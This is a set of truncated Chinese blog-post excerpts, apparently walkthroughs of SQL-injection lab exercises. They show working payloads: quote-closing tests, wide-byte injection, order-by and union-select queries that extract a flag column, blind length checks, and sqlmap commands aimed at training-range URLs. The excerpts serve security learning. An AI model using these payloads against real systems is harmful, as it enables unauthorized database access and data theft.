1.输入 账号：zkz  密码：zhz    看到相关提示信息，尝试闭合。2.账号：")#                    

1. 在登陆框输入   username：admin           password：password看到提示的语句，开始实施注入2. 因为没有该死waf，所以直接注入构造payload：' order by 3#最后得到有 2列3.继续注入得到回显的位置，一般可以

首先构造闭合语句，寻找关键回显的位置用来判断对错1.http://120.203.13.75:8150/New/TimeBased/RankOne/sql-one/?id=1' --+                  &

1.输入  admin：zkz   password：zkz2.开始宽字节注入，在登陆框中输入  admin:%df'   password:               可能被过滤，所以试试

测试输入单引号，发现被转义了，输入 /'                      ///'                  /////'   

寻找闭合语句，闭合成功后根据我上一篇文章找思路下面我演示sqlmap注入过程1.sqlmap -u http://120.203.13.75:8150/New/BlindBased/RankTwo/sql-two/?id=1 --dbs     看是否可以注入2.sqlmap -u http://120.203.13.75:8150/New/BlindBas

1.http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1'  and  length(database())=8 --+                     判断数据库长度2.http://120

1.  http://120.203.13.75:8150/New/ErrorBased/RankTwo/sql-two/?id=1 and 1=2  union select 1,2,group_concat(flag,0x3a,zKaQ) from zkaq --+         &

1. http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1' order by 3 --+                     闭合语句，并且查询字段2.

1. http://o1.lab.aqlab.cn:81/?id=1' --+                                           &nbs